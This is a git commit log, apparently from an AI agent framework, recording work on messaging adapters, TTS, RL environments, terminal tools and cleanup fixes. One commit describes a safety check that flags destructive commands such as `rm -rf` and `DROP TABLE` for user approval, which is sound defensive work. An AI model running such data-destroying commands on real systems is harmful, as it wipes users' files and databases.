- Race condition in file_tools between existence check and access (KeyError)
- Per-task creation locks never cleaned up (memory leak)
2026-02-16 19:47:23 -08:00
teknium1
8117d0adab Refactor file operations and environment management in file_tools and terminal_tool
- Improved the caching mechanism for ShellFileOperations to ensure stale entries are invalidated when environments are cleaned up.
- Enhanced thread safety by refining the use of locks during environment creation and cleanup processes.
- Streamlined the cleanup of inactive environments to prevent blocking other tool calls, ensuring efficient resource management.
- Added error handling and messaging improvements for better user feedback during environment cleanup.
2026-02-16 19:37:40 -08:00
teknium1
01a3a6ab0d Implement cleanup guard to prevent multiple executions on exit
- Introduced a new cleanup function that ensures terminal and browser sessions are cleaned up only once during application exit.
- Updated atexit registration to use the new cleanup function, enhancing resource management and preventing potential issues from multiple cleanup calls.
- Modified terminal cleanup messaging to only display when environments are cleaned, improving user feedback.
2026-02-16 02:43:45 -08:00
teknium1
45a8098d3a Remove browserbase SDK check and add Node.js and agent-browser validation in doctor script
- Removed the check for the browserbase SDK from the optional packages list.
- Added validation for Node.js installation and the presence of the agent-browser package, providing feedback on their status for browser automation tools.
2026-02-16 02:41:24 -08:00
teknium1
60812ae041 Enhance configuration checks and persona file creation in doctor and install scripts
- Updated the doctor script to load environment variables from user-specific and project-specific `.env` files, improving configuration management.
- Added checks for the existence of the `SOUL.md` persona file, providing feedback on its status and creating it with a template if missing.
- Enhanced install scripts to create the `SOUL.md` file if it doesn't exist, ensuring users can easily customize the agent's personality.
2026-02-16 02:38:19 -08:00
teknium1
635bec06cb Update tool definitions handling in GatewayRunner
- Modified the retrieval of tool definitions to use the agent result's "tools" key, ensuring accurate logging in the transcript.
- Enhanced the response structure to include tools in the final output, improving the clarity of tool usage in session interactions.
2026-02-16 00:55:18 -08:00
teknium1
0f58dfdea4 Enhance agent response handling and transcript logging
- Refactored the agent response processing to return a comprehensive result dictionary, including final responses and full message history.
- Improved transcript logging to capture the complete conversation, including tool calls and intermediate reasoning, facilitating session resumption and debugging.
- Added handling for fresh sessions to include tool definitions in the transcript for clarity.
- Implemented logic to filter and timestamp new messages, ensuring accurate logging of user and assistant interactions.
2026-02-16 00:53:17 -08:00
teknium1
dd5fe334f3 Refactor configuration handling to improve user experience
- Implemented deep copy of DEFAULT_CONFIG to prevent mutations during config loading.
- Enhanced user config merging process to clarify the deep merge of user values over defaults.
- Added newline handling when appending environment variables to ensure proper formatting.
- Updated the set_config_value function to write only user-specific configurations back to the file, avoiding overwriting default values.
2026-02-16 00:33:45 -08:00
teknium1
e0c9d495ef Refine configuration migration process to improve user experience
- Updated prompts for the OPENAI_BASE_URL to clarify its use for custom endpoints.
- Enhanced the migration function to skip "advanced" environment variables during interactive configuration, streamlining the setup for standard users.
- Improved messaging for missing optional API keys, ensuring clearer guidance for users during configuration.
2026-02-15 21:53:59 -08:00
teknium1
2f34e6fd30 Update OpenAI configuration prompts for clarity and detail
- Revised descriptions and prompts for the OPENAI_BASE_URL and OPENAI_API_KEY environment variables to enhance user understanding.
- Added a URL reference for the OPENAI_API_KEY to guide users in obtaining their API key.
- Specified the use of the API key for voice transcription and custom endpoints, improving the overall configuration documentation.
2026-02-15 21:48:07 -08:00
teknium1
69aa35a51c Add messaging platform enhancements: STT, stickers, Discord UX, Slack, pairing, hooks
Major feature additions inspired by OpenClaw/ClawdBot integration analysis:

Voice Message Transcription (STT):
- Auto-transcribe voice/audio messages via OpenAI Whisper API
- Download voice to ~/.hermes/audio_cache/ on Telegram/Discord/WhatsApp
- Inject transcript as text so all models can understand voice input
- Configurable model (whisper-1, gpt-4o-mini-transcribe, gpt-4o-transcribe)

Telegram Sticker Understanding:
- Describe static stickers via vision tool with JSON-backed cache
- Cache keyed by file_unique_id avoids redundant API calls
- Animated/video stickers get emoji-based fallback description

Discord Rich UX:
- Native slash commands (/ask, /reset, /status, /stop) via app_commands
- Button-based exec approvals (Allow Once / Always Allow / Deny)
- ExecApprovalView with user authorization and timeout handling

Slack Integration:
- Full SlackAdapter using slack-bolt with Socket Mode
- DMs, channel messages (mention-gated), /hermes slash command
- File attachment handling with bot-token-authenticated downloads

DM Pairing System:
- Code-based user authorization as alternative to static allowlists
- 8-char codes from unambiguous alphabet, 1-hour expiry
- Rate limiting, lockout after failed attempts, chmod 0600 on data
- CLI: hermes pairing list/approve/revoke/clear-pending

Event Hook System:
- File-based hook discovery from ~/.hermes/hooks/
- HOOK.yaml + handler.py per hook, sync/async handler support
- Events: gateway:startup, session:start/reset, agent:start/step/end
- Wildcard matching (command:* catches all command events)

Cross-Channel Messaging:
- send_message agent tool for delivering to any connected platform
- Enables cron job delivery and cross-platform notifications

Human-Like Response Pacing:
- Configurable delays between message chunks (off/natural/custom)
- HERMES_HUMAN_DELAY_MODE env var with min/max ms settings

Warm Injection Message Style:
- Retrofitted image vision messages with friendly kawaii-consistent tone
- All new injection messages (STT, stickers, errors) use warm style

Also: updated config migration to prompt for optional keys interactively,
bumped config version, updated README, AGENTS.md, .env.example,
cli-config.yaml.example, install scripts, pyproject.toml, and toolsets.
2026-02-15 21:38:59 -08:00
teknium1
5404a8fcd8 Enhance image handling and analysis capabilities across platforms
- Updated the vision tool to accept both HTTP/HTTPS URLs and local file paths for image analysis.
- Implemented caching of user-uploaded images in local directories to ensure reliable access for the vision tool, addressing issues with ephemeral URLs.
- Enhanced platform adapters (Discord, Telegram, WhatsApp) to download and cache images, allowing for immediate analysis and enriched message context.
- Added a new method to auto-analyze images attached by users, enriching the conversation with detailed descriptions.
- Improved documentation for image handling processes and updated related functions for clarity and efficiency.
2026-02-15 16:10:50 -08:00
teknium1
eb49936a60 Update documentation and installation scripts for TTS audio formats
- Clarified the requirements for Telegram voice bubbles, specifying the need for ffmpeg when using Edge TTS.
- Enhanced README and messaging documentation to detail audio delivery formats across platforms.
- Improved installation script messages to inform users about the necessity of ffmpeg for proper audio playback on Telegram.
2026-02-14 16:16:54 -08:00
teknium1
ff9ea6c4b1 Enhance TTS tool to support platform-specific audio formats
- Added detection of the platform from the environment variable to determine the appropriate audio output format.
- Implemented logic to output Opus (.ogg) files for Telegram when using compatible TTS providers, while defaulting to MP3 for others.
2026-02-14 16:13:26 -08:00
teknium1
586b0a7047 Add Text-to-Speech (TTS) support with Edge TTS and ElevenLabs integration
- Updated `pyproject.toml` to include Edge TTS and ElevenLabs as dependencies.
- Enhanced documentation to detail voice message capabilities across platforms and TTS provider options.
- Modified the GatewayRunner to handle MEDIA tags from TTS tool responses, ensuring proper delivery of audio messages.
2026-02-14 16:08:14 -08:00
teknium1
84718d183a Add platform-specific formatting hints and identity for AIAgent
- Introduced a default agent identity prompt to ensure consistent behavior across platforms.
- Added platform-specific formatting hints for CLI, WhatsApp, Telegram, and Discord to guide the agent's output style.
- Updated the AIAgent initialization to accept a platform parameter, enhancing adaptability to different interfaces.
2026-02-12 16:11:16 -08:00
teknium1
3099a2f53c Add timestamp to active system prompt in AIAgent
- Appended the current local date and time to the active system prompt to provide context for the model, addressing potential misinterpretations due to training cutoffs.
2026-02-12 15:59:31 -08:00
teknium1
ed010752dd Update .env.example to use new Docker, Singularity, and Modal images for Python 3.11 with Node.js 20 support 2026-02-12 10:07:03 -08:00
teknium1
f5be6177b2 Add Text-to-Speech (TTS) functionality with multiple providers
Add tool previews

Add AGENTS and SOUL.md support

Add Exec Approval
2026-02-12 10:05:08 -08:00
teknium
89c6f24d48 Merge branch 'main' of github.com:nousresearch/hermes-agent 2026-02-12 05:38:15 +00:00
teknium
f23856df8e Add kill_modal script to manage Modal applications and better handling of file and terminal tools
- Introduced a new script, `kill_modal.sh`, to facilitate stopping running Modal apps, including the ability to stop all apps or specific swe-rex sandboxes.
- Enhanced user experience with clear usage instructions and feedback during the stopping process.
- Improved error handling to ensure smooth execution even if some apps fail to stop.
2026-02-12 05:37:14 +00:00
teknium
1b7bc299f3 Enhance TerminalBench2 environment with task filtering due to incompat with modal and logging improvements
- Updated task filter descriptions for clarity and added a new skip task feature to exclude incompatible tasks.
- Introduced a set of modal incompatible tasks to prevent execution errors in cloud environments.
- Implemented streaming JSONL logging for task results, preserving data even on interruptions.
- Refactored task evaluation logic to include skipped task reporting and improved error handling.
2026-02-12 05:36:45 +00:00
teknium
a291cc99cf more extra kwarg support for provider selection etc on openrouter in agent rl envs and evals 2026-02-12 05:36:25 +00:00
teknium
389ac5e017 pass extrabody for agentloop to ban and allowlist providers on openrouter, control thinking, etc 2026-02-12 05:35:48 +00:00
nightwing
fc792a4be9 Update Project_notes.md: grailed-embedding-search status and TODOs (June 2025) 2026-02-11 17:54:47 -07:00
nightwing
07501bef14 Add Project_notes.md — centralized status tracker for all side projects 2026-02-11 17:36:18 -07:00
teknium1
137ce05324 Add image generation tool to toolsets for messaging platforms
- Included "image_generate" in the toolsets for web, vision, and skills categories, expanding functionality for image-related tasks.
- Updated comments for clarity on the new tool's purpose, ensuring users understand its integration within the existing framework.
2026-02-10 21:04:24 -08:00
teknium1
ada0b4f131 Enhance image handling in platform adapters
- Updated the image generation function description to clarify usage with markdown.
- Added `send_image` method to `BasePlatformAdapter` for native image sending across platforms.
- Implemented `send_image` in `DiscordAdapter` and `TelegramAdapter` to handle image attachments directly.
- Introduced `extract_images` method to extract image URLs from markdown and HTML, improving content processing.
- Enhanced message handling to support sending images as attachments while maintaining text content.
2026-02-10 21:02:40 -08:00
teknium
abe925e212 Update hermes-discord toolset to enable full terminal access with safety checks
- Revised the description to reflect full access capabilities, including terminal usage with a dangerous command approval system.
- Added terminal and file manipulation tools to the toolset, enhancing functionality for users.
- Updated comments for clarity on tool purposes, ensuring better understanding of available features.
2026-02-11 04:44:30 +00:00
teknium1
8fb44608bf Update SKILL.md and related references to implement container binding for labeled shapes and arrows in Excalidraw
- Revised the labeled shape and arrow sections to utilize container binding instead of the deprecated "label" property, ensuring proper text rendering.
- Added warnings about the invalidity of the "label" property and emphasized the use of `boundElements` for text elements.
- Updated examples in dark-mode and general references to reflect the new binding approach, enhancing clarity and usability for users creating diagrams.
2026-02-10 20:05:23 -08:00
teknium1
153cd5bb44 Refactor skills tool integration and enhance system prompt
- Removed the skills_categories tool from the skills toolset, streamlining the skills functionality to focus on skills_list and skill_view.
- Updated the system prompt to dynamically build a compact skills index, allowing the model to quickly reference available skills without additional tool calls.
- Cleaned up related code and documentation to reflect the removal of skills_categories, ensuring clarity and consistency across the codebase.
2026-02-10 19:48:38 -08:00
teknium1
669545f551 Add diagramming skills for Excalidraw
- Introduced a new DESCRIPTION.md file outlining diagram creation skills for visual diagrams and flowcharts using Excalidraw.
- Added SKILL.md for the Excalidraw skill, detailing its functionality, usage, and workflow for creating hand-drawn style diagrams.
- Created references for color palettes, dark mode diagrams, and example diagrams to assist users in utilizing the Excalidraw skill effectively.
- Implemented an upload script for sharing diagrams via Excalidraw.com, ensuring user-friendly access to generated diagrams.
2026-02-10 19:30:46 -08:00
teknium1
cfe2f3fe15 Implement interrupt handling for long-running tool executions in AIAgent
- Added functionality to signal and terminate long-running terminal commands when a new user message is received, allowing for immediate agent response.
- Introduced a global interrupt event in the terminal tool to facilitate early termination of subprocesses.
- Updated the AIAgent class to handle interrupts gracefully, ensuring that remaining tool calls are skipped and appropriate messages are returned to maintain valid message sequences.
2026-02-10 16:34:27 -08:00
teknium1
140d609e0c Refine agent history conversion logic in GatewayRunner
- Enhanced the conversion of message history to agent format by distinguishing between normal and rich agent messages.
- Implemented logic to preserve full message structure for tool-related messages, ensuring valid assistant-to-tool sequences.
- Simplified handling of simple text messages by stripping unnecessary fields while retaining essential role and content information.
2026-02-10 16:16:30 -08:00
teknium
a32ad1a656 Fix infinite interrupt loop in gateway by consuming pending messages with .pop() and clearing interrupt events before recursion
- Added logic to clear the adapter's interrupt event to prevent infinite loops during message processing.
- Updated the get_pending_message method to pop messages from the pending queue, ensuring proper message handling.
2026-02-11 00:05:30 +00:00
teknium1
62ba69a29d Fix gateway exit code to enable systemd auto-restart on connection failure
- Updated the start_gateway function to return a boolean indicating success or failure, allowing for better control over exit codes.
- Modified the main function to handle gateway startup failures, ensuring systemd can automatically restart on transient errors.
- Enhanced error handling in the hermes_cli gateway to exit with code 1 if the gateway fails to connect to any platform.
2026-02-10 16:01:00 -08:00
teknium1
9b0f2a16ca Enhance CLI functionality with retry and undo commands
- Added /retry command to resend the last user message, improving user experience by allowing message re-sending without retyping.
- Introduced /undo command to remove the last user/assistant exchange from conversation history, providing better control over conversation flow.
- Updated save_config_value function to respect user and project config precedence, enhancing configuration management.
- Improved prompt handling and visual output for user input, adapting to terminal width for better readability.
2026-02-10 15:59:46 -08:00
teknium
85e629e915 Add cleanup functionality for orphaned sandboxes in TerminalBench2EvalEnv
- Implemented a cleanup process to terminate any remaining sandboxes after evaluation, addressing issues with orphaned thread pool workers.
- Enhanced logging to inform users about the cleanup process, ensuring better resource management and user awareness.
2026-02-10 23:48:49 +00:00
teknium
999a28062d Implement graceful exit cleanup for terminal tool
- Added a new `_atexit_cleanup` function to handle cleanup of active environments and stop the cleanup thread upon program exit.
- Enhanced logging to inform users about the number of remaining sandboxes being shut down during cleanup.
2026-02-10 22:53:44 +00:00
teknium
ba3fea24f1 Enhance TerminalBench 2 configuration and evaluation handling
- Added task_timeout parameter to enforce a maximum wall-clock time for each task, automatically scoring as FAIL if exceeded.
- Introduced terminal_timeout and tool_pool_size parameters to improve command execution and concurrency management.
- Updated logging to provide detailed task execution times and timeout handling, enhancing overall monitoring.
- Removed outdated evaluate_config.yaml file to streamline configuration management.
2026-02-10 22:53:24 +00:00
teknium
6b4a8d0b17 Add terminal configuration options and enhance environment setup
- Introduced terminal_timeout and terminal_lifetime parameters to control command execution and sandbox inactivity.
- Updated environment variable handling to allow configuration overrides for terminal settings.
- Enhanced logging to provide detailed information about terminal settings during initialization.
- Added tool_pool_size parameter to dynamically resize the thread pool for tool execution, improving concurrency management.
2026-02-10 22:51:50 +00:00
teknium
5ec75e38b9 Enhance tool execution and logging in HermesAgentLoop
- Increased thread pool size for tool execution from 8 to 128 to improve concurrency and prevent starvation.
- Added a function to resize the tool executor dynamically based on configuration.
- Enhanced logging to track API call durations and tool execution times, including warnings for slow tools.
- Improved overall performance monitoring by logging detailed information for each turn in the agent loop.
2026-02-10 22:51:18 +00:00
teknium
ad042fdd68 Update terminalbench_2 configuration for enhanced performance and evaluation
- Increased max_token_length from 16000 to 32000 to allow for longer inputs.
- Adjusted agent_temperature from 0.6 to 0.8 for more varied responses.
- Extended test_timeout from 180 to 600 seconds to accommodate longer evaluations.
- Updated data directory path for saving evaluations to ensure proper organization.
2026-02-10 19:48:41 +00:00
teknium
35ad3146a8 Add new environments and enhance tool context functionality
- Introduced new environments: Terminal Test Environment and SWE Environment, each with default configurations for testing and software engineering tasks.
- Added TerminalBench 2.0 evaluation environment with comprehensive setup for agentic LLMs, including task execution and verification.
- Enhanced ToolContext with methods for uploading and downloading files, ensuring binary-safe operations.
- Updated documentation across environments to reflect new features and usage instructions.
- Refactored existing environment configurations for consistency and clarity.
2026-02-10 19:39:05 +00:00
teknium
e8343f2d87 Refactor Singularity environment for persistent container management
- Updated the _SingularityEnvironment class to utilize a persistent Apptainer instance, allowing state (files, installs, environment changes) to persist across commands.
- Enhanced the initialization process to start a background instance with full isolation and writable filesystem.
- Modified the execute method to connect to the running instance, ensuring commands run within the same container context.
- Implemented cleanup functionality to stop the persistent instance on cleanup or destruction, improving resource management.
- Updated class documentation to reflect new features and usage of the persistent environment.
2026-02-10 06:49:58 +00:00
teknium
1b1307d0d1 Implement Anthropic prompt caching for Claude models via OpenRouter
- Introduced a caching strategy that reduces input token costs by ~75% on multi-turn conversations by caching the conversation prefix.
- Added functions to apply cache control markers to messages, enhancing efficiency in token usage.
- Updated AIAgent to auto-enable prompt caching for Claude models, with configurable cache TTL.
- Enhanced logging to track cache hit statistics when caching is active, improving monitoring of token usage.
2026-02-10 06:49:41 +00:00
teknium
7a11be9f3f Enhance browser tool functionality and cleanup process
- Added checks for local installation of the agent-browser CLI in the `_find_agent_browser` function, improving installation guidance.
- Implemented per-task socket directory management in `_run_browser_command` to prevent concurrency issues.
- Updated `cleanup_browser` to remove per-task socket directories, ensuring proper resource cleanup after task completion.
- Refactored comments for clarity and improved documentation throughout the browser tool code.
2026-02-09 04:36:37 +00:00
teknium1
192ce958c3 Enhance CLI command handling and introduce resource cleanup features
- Added imports for resource cleanup during safe shutdown, including terminal and browser session cleanup.
- Refactored command handling to preserve original case for model names and prompt text, improving user experience.
- Introduced a dedicated interrupt queue to manage user input while the agent is running, preventing race conditions.
- Updated comments and documentation for clarity on command processing and input handling.
2026-02-08 13:31:45 -08:00
teknium1
c441681dc2 Update default model to 'anthropic/claude-opus-4.6' and refine terminal working directory settings
- Changed the default LLM model in the setup wizard and example environment file to 'anthropic/claude-opus-4.6'.
- Updated terminal working directory settings in CLI and related files to use the current directory ('.') instead of '/tmp'.
- Enhanced documentation comments for clarity on terminal configuration and working directory behavior.
2026-02-08 12:56:40 -08:00
teknium
dd70d57b9b Refactor BatchRunner and AIAgent for enhanced reasoning and tool management, improved tool definitions for fileops
- Updated `ALL_POSSIBLE_TOOLS` to auto-derive from `TOOL_TO_TOOLSET_MAP` for consistent schema.
- Introduced `_extract_reasoning_stats` function to track reasoning coverage in assistant turns.
- Enhanced `_process_batch_worker` to discard prompts with no reasoning and aggregate reasoning statistics.
- Updated documentation and comments for clarity on new features and changes.
2026-02-08 20:19:14 +00:00
teknium
f12ea1bc02 Enhance BatchRunner and AIAgent with new configuration options, default model now opus 4.6, default summarizer gemini flash 3
- Added `max_tokens`, `reasoning_config`, and `prefill_messages` parameters to `BatchRunner` and `AIAgent` for improved model response control.
- Updated CLI to support new options for reasoning effort and prefill messages from a JSON file.
- Modified example configuration files to reflect changes in default model and summary model.
- Improved error handling for loading prefill messages and reasoning configurations in the CLI.
- Updated documentation to include new parameters and usage examples.
2026-02-08 10:49:24 +00:00
Teknium
fa76a331b0 Merge pull request #19 from NousResearch/atropos-hermes-agent
Enhance async tool execution and error handling in Hermes agent for A…
2026-02-07 21:01:06 -08:00
teknium
d999d9876d Enhance async tool execution and error handling in Hermes agent for Atropos integration
- Updated `.gitignore` to exclude `testlogs` directory.
- Refactored `handle_web_function_call` in `model_tools.py` to support running async functions in existing event loops, improving compatibility with Atropos.
- Introduced a thread pool executor in `agent_loop.py` for running synchronous tool calls that internally use `asyncio.run()`, preventing deadlocks.
- Added `ToolError` class to track tool execution errors, enhancing error reporting during agent loops.
- Updated `wandb_log` method in `hermes_base_env.py` to log tool error statistics for better monitoring.
- Implemented patches in `patches.py` to ensure async-safe operation of tools within Atropos's event loop.
- Enhanced `ToolContext` and `terminal_tool.py` to utilize the new async handling, improving overall tool execution reliability.
2026-02-08 05:00:47 +00:00
Teknium
578a5fb6a9 Merge pull request #18 from NousResearch/atropos-hermes-agent
Upgrade installers to use uv
2026-02-07 16:00:05 -08:00
teknium
a8809bbd3e Transition installation to uv for py version and speed to be easier to streamline
- Integrated `uv` as a fast Python package manager for automatic Python provisioning and dependency management.
- Updated installation scripts (`setup-hermes.sh`, `install.sh`, `install.ps1`) to utilize `uv` for installing Python and packages, streamlining the setup process.
- Revised `README.md` to reflect changes in installation steps, including symlinking `hermes` for global access and clarifying Python version requirements.
- Adjusted commands in `doctor.py` and other scripts to recommend `uv` for package installations, ensuring consistency across the project.
2026-02-07 23:54:53 +00:00
teknium
a478e44585 Increase max_token_length in TerminalTestEnv to 16000 for enhanced processing capacity 2026-02-07 21:11:07 +00:00
teknium
c0494b3558 Update pyproject.toml to refine dependency management
- Reorganized the 'all' dependencies to include specific optional groups for better modularity.
- Added support for 'hermes-agent' with distinct categories: modal, messaging, cron, cli, and dev.
2026-02-07 21:11:01 +00:00
Teknium
7f1cd014f2 Merge pull request #17 from NousResearch/atropos-hermes-agent
Add support for Atropos Agentic RL environments (requires branch tool…
2026-02-07 09:12:10 -08:00
teknium
07b615e96e Add support for Atropos Agentic RL environments (requires branch tool_call_support in Atropos atm)
- Added new environments for reinforcement learning, including `HermesSweEnv` for software engineering tasks and `TerminalTestEnv` for inline testing.
- Introduced `ToolContext` for unrestricted access to tools during reward computation.
- Updated `.gitignore` to exclude `wandb/` directory.
- Enhanced `README.md` with detailed architecture and usage instructions for Atropos environments.
- Added configuration files for SWE and terminal test environments to streamline setup.
- Removed unnecessary compiled Python files from `__pycache__`.
2026-02-07 09:17:16 +00:00
Teknium
ab387a6120 Merge pull request #16 from NousResearch/atropos-hermes-agent
Update dependencies and enhance installation scripts
2026-02-06 16:05:50 -08:00
teknium
ac79725923 Update dependencies and enhance installation scripts
- Added `prompt_toolkit` as a direct dependency for interactive CLI support.
- Updated `modal` optional dependency to require `swe-rex[modal]>=1.4.0` for improved cloud execution capabilities.
- Enhanced `messaging` optional dependencies to include `aiohttp>=3.9.0` for WhatsApp bridge communication.
- Refined installation scripts to check for Python version requirements, emphasizing the need for Python 3.11+ for RL training tools.
- Improved setup scripts to ensure proper installation of submodules and dependencies, enhancing user experience during setup.
2026-02-07 00:05:04 +00:00
Teknium
8dd38318fc Merge pull request #15 from NousResearch/rl-capabilities
Rl capabilities && File Operator Tools
2026-02-05 03:50:42 -08:00
teknium1
533c064269 Add file manipulation tools and enhance setup scripts
- Introduced file manipulation capabilities in `model_tools.py`, including functions for reading, writing, patching, and searching files.
- Added a new `file` toolset in `toolsets.py` and updated distributions to include file tools.
- Enhanced `setup-hermes.sh` and `install.sh` scripts to check for and optionally install `ripgrep` for faster file searching.
- Implemented a new `file_operations.py` module to encapsulate file operations using shell commands.
- Updated `doctor.py` and `install.ps1` to check for `ripgrep` and provide installation guidance if not found.
- Added fuzzy matching and patch parsing capabilities to improve file manipulation accuracy and flexibility.
2026-02-05 03:49:46 -08:00
teknium1
5c3105b437 Enhance RL test inference with WandB integration and real-time output streaming
- Added unique run ID generation for WandB tracking during test inference.
- Enabled WandB usage for test tracking and updated command-line arguments accordingly.
- Implemented real-time output streaming for process execution, improving log visibility and debugging.
- Enhanced error handling to display last few lines of stderr for better troubleshooting.
2026-02-04 21:07:07 -08:00
teknium1
3c0d0dba49 Update RL tools and enhance configuration management
- Modified `model_tools.py` to update default model IDs and add new RL function `rl_test_inference`.
- Enhanced `README.md` with installation instructions for submodules and updated API key usage.
- Improved `rl_cli.py` to load configuration from `~/.hermes/config.yaml` and set terminal working directory for RL tools.
- Updated `run_agent.py` to handle empty string arguments as empty objects for better JSON validation.
- Refined installation scripts to ensure submodules are cloned and installed correctly, enhancing setup experience.
2026-02-04 13:57:59 -08:00
teknium1
12bbca95ec Add tinker-atropos submodule and update RL training tools
- Added the tinker-atropos submodule for enhanced RL training capabilities.
- Updated model_tools.py to reorder RL function definitions and improve descriptions.
- Modified rl_cli.py to include checks for the tinker-atropos setup and provide user guidance.
- Adjusted toolsets.py and __init__.py to reflect changes in RL function availability.
- Enhanced rl_training_tool.py to manage training processes directly without a separate API server.
2026-02-04 10:36:01 -08:00
teknium1
f6574978de Add RL training configuration and tools
- Updated `.env.example` to include Tinker and WandB API keys for reinforcement learning training.
- Enhanced `model_tools.py` to clarify configuration options and streamline the RL training process.
- Expanded `README.md` with detailed instructions for setting up RL training using Tinker and WandB.
- Modified `hermes_cli` files to integrate RL training tools and ensure proper configuration checks.
- Improved `rl_training_tool.py` to reflect changes in training parameters and configuration management.
2026-02-04 09:36:51 -08:00
Teknium
8380895ae3 Update README.md 2026-02-04 00:35:45 -08:00
teknium1
f018999da9 initial RL training tools and loop 2026-02-03 23:41:26 -08:00
teknium1
51a6b7d2b5 Implement interrupt handling for message processing in GatewayRunner and BasePlatformAdapter
- Introduced a monitoring mechanism in GatewayRunner to detect incoming messages while an agent is active, allowing for graceful interruption and processing of new messages.
- Enhanced BasePlatformAdapter to manage active sessions and pending messages, ensuring that new messages can interrupt ongoing tasks effectively.
- Improved the handling of pending messages by checking for interrupts and processing them in the correct order, enhancing user experience during message interactions.
- Updated the cleanup process for active tasks to ensure proper resource management after interruptions.
2026-02-03 20:10:15 -08:00
teknium1
9bfe185a2e Implement interrupt handling for agent and CLI input and persistent prompt line at bottom of CLI :)
- Enhanced the AIAgent class to support interrupt requests, allowing for graceful interruption of ongoing tasks and processing of new messages.
- Updated the HermesCLI to manage user input in a persistent manner, enabling real-time interruption of the agent's conversation.
- Introduced a mechanism in the GatewayRunner to handle incoming messages while an agent is running, allowing for immediate response to user commands.
- Improved overall user experience by providing feedback during interruptions and ensuring that pending messages are processed correctly.
2026-02-03 16:15:49 -08:00
teknium1
beeb7896e0 Refactor message handling and error logging in agent and gateway
- Updated the AIAgent class to extract the first user message for trajectory formatting, improving the accuracy of user queries in the trajectory format.
- Enhanced the GatewayRunner to convert transcript history into the agent format, ensuring proper handling of message roles and content.
- Adjusted the typing indicator refresh rate to every 2 seconds for better responsiveness.
- Improved error handling in the message sending process for the Telegram adapter, implementing a fallback mechanism for Markdown parsing failures, and logging send failures for better debugging.
2026-02-03 15:42:54 -08:00
teknium1
212460289b Enhance skills tool to have an arg so it is more reliably called, and error handling in agent
- Updated the `skills_categories` function to include a `verbose` parameter, allowing users to request skill counts per category.
- Modified the `handle_skills_function_call` method to pass the `verbose` argument to `skills_categories`.
- Improved error handling in the `AIAgent` class by injecting a recovery message when invalid JSON arguments are detected, guiding users on how to correct their tool calls.
- Enhanced the `GatewayRunner` to return a user-friendly error message if the agent fails to generate a final response, improving overall user experience.
2026-02-03 15:26:59 -08:00
teknium1
221fb17c5e Refine typing indicator behavior in message handling
- Adjusted the `_keep_typing` method to refresh the typing indicator every 2 seconds instead of 4, improving responsiveness after progress messages.
- Updated the `GatewayRunner` to restore the typing indicator after sending progress messages, enhancing user experience during message processing.
2026-02-03 15:06:18 -08:00
teknium1
488deb04a4 fix telegram, import asyncio 2026-02-03 15:02:41 -08:00
teknium1
9d9eea9ac9 Enhance agent configuration and documentation for tool progress and working directory
- Updated the AIAgent class to include new parameters for maximum iterations and tool progress callback, improving agent behavior and user feedback.
- Added detailed documentation on working directory behavior for CLI and messaging platforms, clarifying the use of `MESSAGING_CWD`.
- Introduced tool progress notifications in messaging, allowing users to receive real-time updates during tool execution.
- Updated relevant sections in AGENTS.md, README.md, and messaging.md to reflect these enhancements and provide clearer setup instructions.
2026-02-03 14:57:27 -08:00
teknium1
e7f0ffbf5d Add tool progress notifications for messaging channels
- Introduced a new callback mechanism in the AIAgent class to send tool progress messages during execution, enhancing user feedback in messaging platforms.
- Updated the GatewayRunner to support tool progress notifications, allowing users to enable or disable this feature via environment variables.
- Enhanced the CLI setup wizard to prompt users for enabling tool progress messages and selecting the notification mode (all or new), improving configuration options.
- Updated relevant documentation to reflect the new features and configuration settings for tool progress notifications.
2026-02-03 14:54:43 -08:00
teknium1
a09b018bd5 Implement continuous typing indicator in message handling
- Added a new private method `_keep_typing` to send a typing indicator continuously while processing messages, refreshing every 4 seconds to comply with Telegram/Discord limitations.
- Updated the `handle_message` method to initiate the typing indicator at the start of message processing and ensure it stops once processing is complete, improving user experience during message handling.
2026-02-03 14:51:31 -08:00
teknium1
7eac4ee9fe Update agent configuration for maximum tool-calling iterations
- Increased the default maximum tool-calling iterations from 20 to 60 in the CLI configuration and related files, allowing for more complex tasks.
- Updated documentation and comments to reflect the new recommended range for iterations, enhancing user guidance.
- Implemented backward compatibility for loading max iterations from the root-level configuration, ensuring a smooth transition for existing users.
- Adjusted the setup wizard to prompt for the maximum iterations setting, improving user experience during configuration.
2026-02-03 14:48:19 -08:00
teknium1
17a5efb416 Enhance messaging gateway configuration and security features
- Added new environment variables for Telegram and Discord bot configurations, including `TELEGRAM_ALLOWED_USERS` and `DISCORD_ALLOWED_USERS`, to restrict bot access to specific users.
- Updated documentation in AGENTS.md and README.md to include detailed setup instructions for the messaging gateway, emphasizing the importance of user allowlists for security.
- Improved the CLI setup wizard to prompt for allowed user IDs during configuration, enhancing user guidance and security awareness.
- Refined the gateway run script to support user authorization checks, ensuring only allowed users can interact with the bot.
2026-02-03 10:46:23 -08:00
teknium1
3e634aa7e4 Update requirements and enhance environment variable loading in gateway
- Updated requirements.txt to uncomment and ensure the installation of `python-telegram-bot` and `discord.py` packages.
- Enhanced the gateway run script to load environment variables from a specified path, improving configuration management and flexibility for different environments.
2026-02-03 07:02:59 -08:00
teknium1
5d3398aa8a Refactor terminal tool command approval process and enhance CLI feedback
- Updated the terminal tool's command approval flow to improve user interaction when executing potentially dangerous commands, replacing the previous confirmation method with a clear explanation and instructions for adding commands to the allowlist.
- Removed the internal `force` parameter from the model API, ensuring that dangerous command approvals are handled solely through user prompts.
- Enhanced the CLI to provide better feedback regarding tool availability, including improved messaging for enabled and disabled toolsets.
- Updated AGENTS.md to reflect changes in the command approval process and configuration instructions.
2026-02-02 23:46:41 -08:00
teknium1
76d929e177 Implement dangerous command approval system for terminal tool
- Added a safety mechanism to detect and approve potentially dangerous commands (e.g., `rm -rf`, `DROP TABLE`).
- Introduced an approval flow for local/SSH backends, prompting users for confirmation with options to allow once, for the session, or permanently.
- Updated configuration to include a `command_allowlist` for storing approved patterns.
- Enhanced messaging for sudo failures in messaging contexts.
- Updated relevant documentation in AGENTS.md and TODO.md to reflect these changes.
2026-02-02 23:35:18 -08:00
Teknium
be91af7551 Refactor TODO list and remove completed items
Removed high-priority immediate fixes section and reorganized the TODO list. Updated various sections to reflect new priorities and ideas.
2026-02-02 23:08:27 -08:00
teknium1
c9011fc7e1 Add uninstall command to CLI and update documentation
- Introduced a new `uninstall` command in the CLI for the Hermes Agent, allowing users to remove the agent while optionally retaining configuration files for future reinstallation.
- Updated AGENTS.md and README.md to include the new uninstall functionality, enhancing user guidance on available commands and their purposes.
- Improved command-line interface with detailed help options for the uninstall process, including flags for full removal and confirmation prompts.
2026-02-02 22:18:18 -08:00
teknium1
